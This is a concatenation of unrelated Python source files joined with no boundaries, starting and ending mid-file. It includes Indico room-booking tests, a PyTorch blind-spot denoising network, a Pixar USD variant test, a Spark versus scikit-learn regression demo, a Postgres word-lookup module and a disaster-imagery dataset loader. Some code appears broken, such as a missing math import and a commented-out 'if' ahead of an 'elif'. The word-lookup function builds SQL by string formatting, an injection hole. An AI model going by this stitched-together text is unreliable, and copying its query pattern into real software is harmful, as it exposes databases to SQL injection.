dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)),), (('create', dummy_user, room, date(2020, 2, 2), date(2020, 2, 3)),) ] def test_update_called_on_reject(dummy_user, create_room, mocker, no_csrf_client, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room(attributes=[RoomAttributeAssociation(attribute=attr_lock, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-05", 'end_dt': "2020-02-06", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, }) assert response.status_code == 200 booking = Reservation.get(response.json['booking']['id']) adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 5), date(2020, 2, 6)) no_csrf_client.post(url_for('rb.booking_state_actions', booking_id=booking.id, action='cancel')) # after the pre-booking is accepted, _adams_request should be called adams_request.assert_called_with('cancel', dummy_user, room, date(2020, 2, 5), date(2020, 2, 6)) assert adams_request.call_count == 2 def test_auto_cancel(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): attr_approval = room_attributes[1] notify_cancel = mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True, attributes=[RoomAttributeAssociation(attribute=attr_approval, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-02", # This is a Monday 'end_dt': "2020-03-10", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 3)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, a warning freeze_time(datetime(2020, 3, 4)) auto_cancel_bookings() assert notify_about_to_cancel.called assert not notify_cancel.called # reset mocks notify_about_to_cancel.reset_mock() notify_cancel.reset_mock() # 3 days after the start date, cancellation happens freeze_time(datetime(2020, 3, 5)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert notify_cancel.called def test_auto_cancel_weekend(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): attr_approval = room_attributes[1] notify_cancel = mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True, attributes=[RoomAttributeAssociation(attribute=attr_approval, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-05", # This is a Thursday 'end_dt': "2020-03-15", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 6)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, still nothing (weekend) freeze_time(datetime(2020, 3, 7)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 3 days after the start date, same freeze_time(datetime(2020, 3, 8)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 4 days after the start date, cancellation warning freeze_time(datetime(2020, 3, 9)) auto_cancel_bookings() assert notify_about_to_cancel.called assert not notify_cancel.called # reset mocks notify_about_to_cancel.reset_mock() notify_cancel.reset_mock() # 5 days after the start date, cancellation happens freeze_time(datetime(2020, 3, 10)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert notify_cancel.called def test_no_auto_cancel(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): notify_cancel = mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') # room id not set for automatic cancellation room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-02", # This is a Monday 'end_dt': "2020-03-10", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 3)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 4)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 3 days after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 5)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called import os import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.nn import init from functools import partial def init_weights(net, init_type='kaiming', init_gain=0.02): """Initialize network weights. Parameters: net (network) -- network to be initialized init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal init_gain (float) -- scaling factor for normal, xavier and orthogonal. We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might work better for some applications. Feel free to try yourself. """ def init_func(m): # define the initialization function classname = m.__class__.__name__ if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1): if init_type == 'normal': init.normal_(m.weight.data, 0.0, init_gain) elif init_type == 'xavier': init.xavier_normal_(m.weight.data, gain=init_gain) elif init_type == 'kaiming': init.kaiming_normal_(m.weight.data, a=0, mode='fan_in') elif init_type == 'orthogonal': init.orthogonal_(m.weight.data, gain=init_gain) else: raise NotImplementedError('initialization method [%s] is not implemented' % init_type) if hasattr(m, 'bias') and m.bias is not None: init.constant_(m.bias.data, 0.0) elif classname.find('BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies. init.normal_(m.weight.data, 1.0, init_gain) init.constant_(m.bias.data, 0.0) # print('initialize network with %s' % init_type) net.apply(init_func) # apply the initialization function def weights_init_kaiming(lyr): r"""Initializes weights of the model according to the "He" initialization method described in "Delving deep into rectifiers: Surpassing human-level performance on ImageNet classification" - . et al. (2015), using a normal distribution. This function is to be called by the torch.nn.Module.apply() method, which applies weights_init_kaiming() to every layer of the model. """ classname = lyr.__class__.__name__ if classname.find('Conv') != -1: lyr.weight.data = nn.init.kaiming_normal_(lyr.weight.data, a=0, mode='fan_in') elif classname.find('Linear') != -1: nn.init.kaiming_normal_(lyr.weight.data, a=0, mode='fan_in') elif classname.find('BatchNorm') != -1: lyr.weight.data.normal_(mean=0, std=math.sqrt(2./9./64.)).\ clamp_(-0.025, 0.025) nn.init.constant_(lyr.bias.data, 0.0) class TrimmedConv2d(nn.Conv2d): def __init__(self, *args, **kwargs): if 'dilation' in kwargs: self.dilation = kwargs['dilation'] kwargs.pop('dilation') else: self.dilation = 1 if 'direction' in kwargs: self.direction = kwargs['direction'] kwargs.pop('direction') else: self.direction = 0 super(TrimmedConv2d, self).__init__(*args, **kwargs) self.slide_winsize = self.weight.shape[2]*self.weight.shape[3] self.last_size = torch.zeros(2) self.feature_mask=None self.mask_ratio=None self.weight_mask=None self.mask_ratio_dict=dict() self.feature_mask_dict=dict() def update_mask(self): with torch.no_grad(): self.feature_mask=self.feature_mask_dict[str(self.direction)].to(self.weight.device) self.mask_ratio=self.mask_ratio_dict[str(self.direction)].to(self.weight.device) self.weight_mask=self.get_weight_mask().to(self.weight.device) def get_weight_mask(self,direction=None): weight = np.ones((1, 1, self.kernel_size[0], self.kernel_size[1])) weight[:, :, self.kernel_size[0] // 2, self.kernel_size[1] // 2] = 0 return torch.tensor(weight.copy(),dtype=torch.float32) def update_feature_mask_dict(self,input_h,input_w): with torch.no_grad(): for direct in range(0,1): mask = torch.ones(1, 1, int(input_h), int(input_w)) weight_mask=self.get_weight_mask(direct) (pad_h,pad_w)=self.padding pad=torch.nn.ZeroPad2d((pad_w,pad_w,pad_h,pad_h)) feature_mask = F.conv2d(pad(mask), weight_mask, bias=None, stride=self.stride, dilation=self.dilation, groups=1) mask_ratio = self.slide_winsize / (feature_mask + 1e-8) # mask_ratio=torch.sqrt(mask_ratio) feature_mask = torch.clamp(feature_mask, 0, 1) mask_ratio = torch.mul(mask_ratio, feature_mask) self.mask_ratio_dict[str(direct)]=mask_ratio self.feature_mask_dict[str(direct)]=feature_mask def updata_last_size(self,h,w): self.last_size.copy_(torch.tensor((h,w),dtype=torch.int32)) def forward(self, input): if (int(self.last_size[0].item()),int(self.last_size[1].item()))!= (int(input.data.shape[2]), int(input.data.shape[3])): self.update_feature_mask_dict(input.data.shape[2],input.data.shape[3]) self.update_mask() self.updata_last_size(input.data.shape[2],input.data.shape[3]) if self.feature_mask is None or self.mask_ratio is None or self.weight_mask is None: #self.update_feature_mask_dict() self.update_mask() #if self.feature_mask.device != self.weight.device or self.mask_ratio.device != self.weight.device or self.weight_mask.device!=self.weight.device: # with torch.no_grad(): w=torch.mul(self.weight, self.weight_mask) raw_out = F.conv2d(input,w,self.bias, self.stride, self.padding, self.dilation, self.groups) if self.bias is not None: bias_view = self.bias.view(1, self.out_channels, 1, 1) output = torch.mul(raw_out - bias_view, self.mask_ratio) + bias_view output = torch.mul(output, self.feature_mask) else: output = torch.mul(raw_out, self.mask_ratio) return output class MaskConv2d(nn.Conv2d): def __init__(self, *args, **kwargs): if 'dilation' in kwargs: self.dilation = kwargs['dilation'] kwargs.pop('dilation') else: self.dilation = 1 if 'direction' in kwargs: self.direction = kwargs['direction'] kwargs.pop('direction') else: self.direction = 0 super(MaskConv2d, self).__init__(*args, **kwargs) self.weight_mask = self.get_weight_mask() # remove the center position, [1 1 1;1 0 1;1 1 1] def get_weight_mask(self): weight = np.ones((1, 1, self.kernel_size[0], self.kernel_size[1])) weight[:, :, self.kernel_size[0] // 2, self.kernel_size[1] // 2] = 0 return torch.tensor(weight.copy(), dtype=torch.float32) def forward(self, input): if self.weight_mask.type() != self.weight.type(): with torch.no_grad(): self.weight_mask = self.weight_mask.type(self.weight.type()) w=torch.mul(self.weight,self.weight_mask) output = F.conv2d(input, w, self.bias, self.stride, self.padding, self.dilation, self.groups) return output def BlindSpotConv(in_planes, out_planes, kernel_size, stride=1, dilation=1, bias=False, conv_type='Trimmed'): if conv_type.lower()=='trimmed': return TrimmedConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size+(kernel_size-1)*(dilation-1)-1)//2, dilation=dilation, bias=bias, direction=0) elif conv_type.lower()=='mask': return MaskConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size+(kernel_size-1)*(dilation-1)-1)//2, dilation=dilation, bias=bias, direction=0) else: raise BaseException("Invalid Conv Type!") class Inception_block(nn.Module): def __init__(self, inplanes, kernel_size, dilation, bias, activate_fun): super(Inception_block, self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' % (activate_fun)) # pad_size = (kernel_size+(kernel_size-1)*(dilation-1)-1)//2 # inception_br1 ---------------------------------------------- lyr_br1=[] # 1x1 conv lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br1.append(self.relu()) # # case1: two 3x3 dilated-conv # lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) # lyr_br1.append(self.relu()) # lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) # lyr_br1.append(self.relu()) # case2: one 5x5 dilated-conv tmp_kernel_size = 5 tmp_pad_size = (tmp_kernel_size+(tmp_kernel_size-1)*(dilation-1)-1)//2 lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size=tmp_kernel_size, padding=tmp_pad_size, dilation=dilation, bias=bias)) lyr_br1.append(self.relu()) self.inception_br1=nn.Sequential(*lyr_br1) init_weights(self.inception_br1) # # inception_br2 ---------------------------------------------- lyr_br2=[] # 1x1 conv lyr_br2.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br2.append(self.relu()) # 3x3 dilated-conv lyr_br2.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) lyr_br2.append(self.relu()) self.inception_br2=nn.Sequential(*lyr_br2) init_weights(self.inception_br2) # # inception_br3 ---------------------------------------------- lyr_br3=[] # 1x1 conv lyr_br3.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br3.append(self.relu()) self.inception_br3=nn.Sequential(*lyr_br3) init_weights(self.inception_br3) # Concat three inception branches self.concat = nn.Conv2d(inplanes*3,inplanes,kernel_size=1,bias=bias) self.concat.apply(weights_init_kaiming) # 1x1 convs lyr=[] lyr.append(nn.Conv2d(inplanes,inplanes,kernel_size=1,bias=bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(inplanes,inplanes,kernel_size=1,bias=bias)) lyr.append(self.relu()) self.middle_1x1_convs=nn.Sequential(*lyr) init_weights(self.middle_1x1_convs) def forward(self, x): residual = x x1 = self.inception_br1(x) x2 = self.inception_br2(x) x3 = self.inception_br3(x) out = torch.cat((x1, x2, x3), dim=1) out = self.concat(out) out = torch.relu_(out) out = out + residual out = self.middle_1x1_convs(out) return out class DBSN_branch(nn.Module): def __init__(self, inplanes, bs_conv_type, bs_conv_bias, bs_conv_ks, block_num, activate_fun): super(DBSN_branch, self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' % (activate_fun)) # dilation_base=(bs_conv_ks+1)//2 # lyr=[] lyr.append(BlindSpotConv(inplanes, inplanes, bs_conv_ks, stride=1, dilation=1, bias=bs_conv_bias, conv_type=bs_conv_type)) lyr.append(self.relu()) lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) lyr.append(self.relu()) # for i in range(block_num): lyr.append(Inception_block(inplanes, kernel_size=3, dilation=dilation_base, bias=bs_conv_bias, activate_fun=activate_fun)) # lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) self.branch=nn.Sequential(*lyr) init_weights(self.branch) def forward(self,x): return self.branch(x) class DBSN_Model(nn.Module): def __init__(self, in_ch, out_ch, mid_ch, blindspot_conv_type, blindspot_conv_bias, br1_blindspot_conv_ks, br1_block_num, br2_blindspot_conv_ks, br2_block_num, activate_fun): super(DBSN_Model,self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' % (activate_fun)) # Head of DBSN lyr = [] lyr.append(nn.Conv2d(in_ch, mid_ch, kernel_size=1, bias=blindspot_conv_bias)) lyr.append(self.relu()) self.dbsn_head = nn.Sequential(*lyr) init_weights(self.dbsn_head) self.br1 = DBSN_branch(mid_ch, blindspot_conv_type, blindspot_conv_bias, br1_blindspot_conv_ks, br1_block_num, activate_fun) self.br2 = DBSN_branch(mid_ch, blindspot_conv_type, blindspot_conv_bias, br2_blindspot_conv_ks, br2_block_num, activate_fun) # Concat two branches self.concat = nn.Conv2d(mid_ch*2,mid_ch,kernel_size=1,bias=blindspot_conv_bias) self.concat.apply(weights_init_kaiming) # 1x1 convs lyr=[] lyr.append(nn.Conv2d(mid_ch,mid_ch,kernel_size=1,bias=blindspot_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(mid_ch,mid_ch,kernel_size=1,bias=blindspot_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(mid_ch,out_ch,kernel_size=1,bias=blindspot_conv_bias)) self.dbsn_tail=nn.Sequential(*lyr) init_weights(self.dbsn_tail) def forward(self, x): x = self.dbsn_head(x) x1 = self.br1(x) x2 = self.br2(x) x_concat = torch.cat((x1,x2), dim=1) x = self.concat(x_concat) return self.dbsn_tail(x), xfrom app import app, db from flask_script import Manager from flask_migrate import Migrate, MigrateCommand import models ## ------------------------ Migrations ------------------------ ## migrate = Migrate(app, db) manager = Manager(app) manager.add_command('db', MigrateCommand) if __name__ == '__main__': # $ python migrate.py db init # $ python migrate.py db migrate # $ python migrate.py db upgrade manager.run()#!/pxrpythonsubst # # Copyright 2017 Pixar # # Licensed under the Apache License, Version 2.0 (the "Apache License") # with the following modification; you may not use this file except in # compliance with the Apache License and the following modification to it: # Section 6. Trademarks. is deleted and replaced with: # # 6. Trademarks. This License does not grant permission to use the trade # names, trademarks, service marks, or product names of the Licensor # and its affiliates, except as required to comply with Section 4(c) of # the License and to reproduce the content of the NOTICE file. # # You may obtain a copy of the Apache License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the Apache License with the above modification is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the Apache License for the specific # language governing permissions and limitations under the Apache License. import os, sys from pxr import Gf, Tf, Sdf, Usd def OpenLayer(name): layerFile = '%s.usda' % name layer = Sdf.Layer.FindOrOpen(layerFile) assert layer, 'failed to open layer @%s@' % layerFile return layer # Open stage. layer = OpenLayer('testAPI_var') stage = Usd.Stage.Open(layer.identifier) assert stage, 'failed to create stage for @%s@' % layer.identifier # Check GetLayerStack behavior. assert stage.GetLayerStack()[0] == stage.GetSessionLayer() # Get LayerStack without session layer. rootLayer = stage.GetLayerStack(includeSessionLayers=False)[0] assert rootLayer == stage.GetRootLayer() # Get Sarah prim. sarah = stage.GetPrimAtPath('/Sarah') assert sarah, 'failed to find prim /Sarah' # Sanity check simple composition. assert sarah.GetAttribute('color').Get() == Gf.Vec3d(1,0,0) # Verify that the base prim does not have the custom attribute that we will # create later in the variant. emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert not emptyPrim.GetAttribute('newAttr') # Should start out with EditTarget being local & root layer. assert (stage.HasLocalLayer(stage.GetEditTarget().GetLayer()) and stage.GetEditTarget().GetLayer() == stage.GetRootLayer()) # Try editing a local variant. displayColor = sarah.GetVariantSet('displayColor') assert displayColor.GetVariantSelection() == 'red' assert sarah.GetVariantSets().GetVariantSelection('displayColor') == 'red' with displayColor.GetVariantEditContext(): sarah.GetAttribute('color').Set(Gf.Vec3d(1,1,1)) stage.DefinePrim(sarah.GetPath().AppendChild('Child'), 'Scope') # Bug 90706 - verify that within a VariantSet, a new attribute that does # not exist on the base prim returns True for IsDefined() over = stage.OverridePrim('/Sarah/EmptyPrim') assert over over.CreateAttribute('newAttr', Sdf.ValueTypeNames.Int) assert over.GetAttribute('newAttr').IsDefined() # Test existence of the newly created attribute again, outside of the edit # context, while we are still set to the variant selection from which we created # the attribute. emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert emptyPrim.GetAttribute('newAttr').IsDefined() assert sarah.GetAttribute('color').Get() == Gf.Vec3d(1,1,1) assert stage.GetPrimAtPath(sarah.GetPath().AppendChild('Child')) # Switch to 'green' variant. displayColor.SetVariantSelection('green') assert displayColor.GetVariantSelection() == 'green' # Should not be picking up variant opinions authored above. assert sarah.GetAttribute('color').Get() == Gf.Vec3d(0,1,0) assert not stage.GetPrimAtPath(sarah.GetPath().AppendChild('Scope')) emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert not emptyPrim.GetAttribute('newAttr').IsDefined() displayColor.ClearVariantSelection() assert displayColor.GetVariantSelection() == '' # Test editing a variant that doesn't yet have opinions. sarah_ref = stage.GetPrimAtPath('/Sarah_ref') displayColor = sarah_ref.GetVariantSet('displayColor') displayColor.SetVariantSelection('red') assert displayColor.GetVariantSelection() == 'red' with displayColor.GetVariantEditContext(): sarah_ref.GetAttribute('color').Set(Gf.Vec3d(2,2,2)) assert sarah_ref.GetAttribute('color').Get() == Gf.Vec3d(2,2,2) def TestNewPayloadAutoLoading(): print 'TestNewPayloadAutoLoading' # Test that switching a variant that introduces a payload causes the payload # to be included if the parent is loaded, and vice versa. rootLayer = Sdf.Layer.CreateAnonymous() payloadLayer = Sdf.Layer.CreateAnonymous() Sdf.CreatePrimInLayer(rootLayer, '/main') Sdf.CreatePrimInLayer(payloadLayer, '/parent/child') stage = Usd.Stage.Open(rootLayer) main = stage.GetPrimAtPath('/main') pvs = main.GetVariantSets().AppendVariantSet('payload_vset') withPayload = pvs.AppendVariant('with_payload') withoutPayload = pvs.AppendVariant('without_payload') pvs.SetVariantSelection('with_payload') with pvs.GetVariantEditContext(): main.SetPayload(payloadLayer, '/parent') pvs.SetVariantSelection('without_payload') # Now open the stage load all, we shouldn't have /main/child. stage = Usd.Stage.Open(rootLayer, load=Usd.Stage.LoadAll) assert stage.GetPrimAtPath('/main') assert not stage.GetPrimAtPath('/main/child') # Switching the selection should cause the payload to auto-load. stage.GetPrimAtPath('/main').GetVariantSet( 'payload_vset').SetVariantSelection('with_payload') main = stage.GetPrimAtPath('/main') assert main and main.IsLoaded() assert stage.GetPrimAtPath('/main/child') # Open the stage again, but with load-none. stage = Usd.Stage.Open(rootLayer, load=Usd.Stage.LoadNone) assert stage.GetPrimAtPath('/main') assert not stage.GetPrimAtPath('/main/child') # Switching the selection should NOT cause the payload to auto-load. stage.GetPrimAtPath('/main').GetVariantSet( 'payload_vset').SetVariantSelection('with_payload') main = stage.GetPrimAtPath('/main') assert main and not main.IsLoaded() assert not stage.GetPrimAtPath('/main/child') TestNewPayloadAutoLoading() print 'OK' # -*- coding: UTF-8 -*- """ 此脚本用于展示如何Spark MLlib中LinearRegressionWithSGD的缺陷 """ import os import numpy as np import pandas as pd import matplotlib.pyplot as plt from sklearn.linear_model import LinearRegression as sklearnLR from pyspark.sql import SparkSession from pyspark.mllib.regression import LabeledPoint, LinearRegressionWithSGD def read_data(path): """ 利用pandas读取数据 """ data = pd.read_csv(path, header=None) return np.c_[data.values[:, 0], data.values[:, 3]] def generate_data(n): """ 生成训练模型的数据 """ np.random.seed(4060) x = np.linspace(-7, 7, n) error = np.random.randn(n) y = 1 * x + 2 + error return np.c_[y, x] def start_spark(): """ 创建SparkSession,这是Spark程序的入口 """ spark = SparkSession.builder.appName("sparkml_vs_sklearn").getOrCreate() return spark def trans_2_RDD(data, sc): """ 将Python里的数据转换为RDD """ data = sc.parallelize(data) data = data.map(lambda line: LabeledPoint(line[0], line[1:])) return data def train_model(data, rdd): """ 分别使用scikit-learn和Spark MLlib训练模型 """ sklearn_model = sklearnLR() sklearn_model.fit(data[:, 1:], data[:, 0]) mllib_model = LinearRegressionWithSGD.train(rdd, intercept=True) return sklearn_model, mllib_model def run(spark, data_path): """ 程序的入口 """ data = read_data(data_path) rdd = trans_2_RDD(data, spark._sc) sklearn_model, mllib_model = train_model(data, rdd) # 创建一个图形框 fig = plt.figure(figsize=(12, 6), dpi=80) ax = fig.add_subplot(1, 2, 1) _visualize(sklearn_model, mllib_model, data, ax) data = generate_data(200) rdd = trans_2_RDD(data, spark._sc) sklearn_model, mllib_model = train_model(data, rdd) ax = fig.add_subplot(1, 2, 2) _visualize(sklearn_model, mllib_model, data, ax) plt.show() def _visualize(sklearn_model, mllib_model, data, ax): """ 将模型结果可视化 """ ax.set_ylim([data[:, 0].min()-1, data[:, 0].max()+1]) ax.scatter(data[:, 1], data[:, 0], alpha=0.5) x = np.linspace(data[:, 1].min(), data[:, 1].max(), 100) ax.plot(x, sklearn_model.predict(x.reshape(-1, 1)), "k", linewidth=2, label="scikit-learn") ax.plot(x, [mllib_model.predict(i) for i in x.reshape(-1, 1)], "r-.", linewidth=2, label="Spark MLlib") legend = plt.legend(shadow=True) if __name__ == "__main__": spark = start_spark() home_path = os.path.dirname(os.path.abspath(__file__)) # Windows下的存储路径与Linux并不相同 if os.name == "nt": data_path = "%s\\data\\reg_data.csv" % home_path else: data_path = "%s/data/reg_data.csv" % home_path run(spark, data_path) SteveLim99/graphAI_webapp graphs = { 'BPNM': 1, 'Swimlane': 2 }Winnetou/ManuTironis # here we talk to table words - get them, check they exists, etc import psycopg2 conn = psycopg2.connect("dbname=manu_tironis user=quellen password=") cursor = conn.cursor() def get_smlar_len_words(incorrect): """ :return: all words of len close to len(incorrect). """ ln = len(incorrect) cursor.execute('''SELECT word FROM words WHERE char_length(WORD)>%s AND char_length(WORD)<%s''', (ln - 1, ln + 1)) c = cursor.fetchall() words = [] for sublist in c: for element in sublist: words.append(element) return words def word_exists_in_dictionary(word): try: query_str = '''select exists(select word from words where word='{}')'''.format(word) cursor.execute(query_str) res = cursor.fetchone() return res[0] except: conn.rollback() return False def save_single_word(word): """ Saves a word to the database if it is not there yet """ word = clean(word) # FIXME # there must be a way to do that in smarter way on posgtres # maybe upsert ? # TODO - what shall we do about uppercase? try: exists_query = "SELECT EXISTS (SELECT word from words WHERE word = %s)" cursor.execute(exists_query, (word,)) if cursor.fetchone()[0]: return insert_command = "INSERT INTO words (word) VALUES (%s)" cursor.execute(insert_command, (word,)) conn.commit() except: conn.rollback() raise # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. import logging from PIL import Image from glob import glob import numpy as np import torch from torch.utils.data import Dataset import torchvision.transforms.functional as TF from torchvision import transforms import random import os class DisasterDataset(Dataset): def __init__(self, data_dir, data_dir_ls, data_mean_stddev, transform:bool, normalize:bool): self.data_dir = data_dir self.dataset_sub_dir = data_dir_ls self.data_mean_stddev = data_mean_stddev self.transform = transform self.normalize = normalize def __len__(self): return len(self.dataset_sub_dir) @classmethod def apply_transform(self, mask, pre_img, post_img, damage_class): ''' apply tranformation functions on PIL images ''' if random.random() > 0.5: # Resize img_h = pre_img.size[0] img_w = pre_img.size[1] resize = transforms.Resize(size=(int(round(1.016*img_h)), int(round(1.016*img_w)))) mask = resize(mask) pre_img = resize(pre_img) post_img = resize(post_img) damage_class = resize(damage_class) # Random crop i, j, h, w = transforms.RandomCrop.get_params(pre_img, output_size=(img_h, img_w)) mask = TF.crop(mask, i, j, h, w) pre_img = TF.crop(pre_img, i, j, h, w) post_img = TF.crop(post_img, i, j, h, w) damage_class = TF.crop(damage_class, i, j, h, w) # Random horizontal flipping if random.random() > 0.5: mask = TF.hflip(mask) pre_img = TF.hflip(pre_img) post_img = TF.hflip(post_img) damage_class = TF.hflip(damage_class) # Random vertical flipping if random.random() > 0.5: mask = TF.vflip(mask) pre_img = TF.vflip(pre_img) post_img = TF.vflip(post_img) damage_class = TF.vflip(damage_class) return mask, pre_img, post_img, damage_class def __getitem__(self, i): imgs_dir = os.path.join(self.data_dir ,self.dataset_sub_dir[i].replace('labels', 'images')) imgs_dir_tile = self.dataset_sub_dir[i].replace('labels', 'images') masks_dir = os.path.join(self.data_dir, self.dataset_sub_dir[i].replace('labels', 'targets_border2')) preds_dir = os.path.join(self.data_dir ,self.dataset_sub_dir[i].replace('labels', 'predictions')) idx = imgs_dir img_suffix = '_' + imgs_dir.split('_')[-1] img_suffix_tile = '_' + imgs_dir_tile.split('_')[-1] mask_suffix = '_' + masks_dir.split('_')[-1] pre_img_tile_name = imgs_dir_tile[0:-1*(len(img_suffix_tile))] + '_pre_disaster' pre_img_file_name = imgs_dir[0:-1*(len(img_suffix))] + '_pre_disaster' + img_suffix pre_img_file = glob(pre_img_file_name + '.*') mask_file_name = masks_dir[0:-1*(len(mask_suffix))] + '_pre_disaster_b2' + mask_suffix mask_file = glob(mask_file_name + '.*') post_img_tile_name = pre_img_tile_name.replace('pre', 'post') post_img_file_name = pre_img_file_name.replace('pre', 'post') post_img_file = glob(post_img_file_name + '.*') damage_class_file_name = mask_file_name.replace('pre', 'post') damage_class_file = glob(damage_class_file_name + '.*') assert len(mask_file) == 1, \ f'Either no mask or multiple masks found for the ID {idx}: {mask_file_name}' assert len(pre_img_file) == 1, \ f'Either no image or multiple images found for the ID {idx}: {pre_img_file_name}' assert len(post_img_file) == 1, \ f'Either no post disaster image or multiple images found for the ID {idx}: {post_img_file_name}' assert len(damage_class_file) == 1, \ f'Either no damage class image or multiple images found for the ID {idx}: {damage_class_file_name}' mask = Image.open(mask_file[0]) pre_img = Image.open(pre_img_file[0]) post_img = Image.open(post_img_file[0]) damage_class = Image.open(damage_class_file[0]) assert pre_img.size == mask.size, \ f'Image and building mask {idx} should be the same size, but are {pre_img.size} and {mask.size}' assert pre_img.size == damage_class.size, \ f'Image and damage classes mask {idx} should be the same size, but are {pre_img.size} and {damage_class.size}' assert pre_img.size == post_img.size, \ f'Pre_ & _post disaster Images {idx} should be the same size, but are {pre_img.size} and {post_img.size}' if self.transform is True: mask, pre_img, post_img, damage_class = self.apply_transform(mask, pre_img, post_img, damage_class) # copy original image for viz pre_img_orig = pre_img post_img_orig = post_img if self.normalize is True: # normalize the images based on a tilewise mean & std 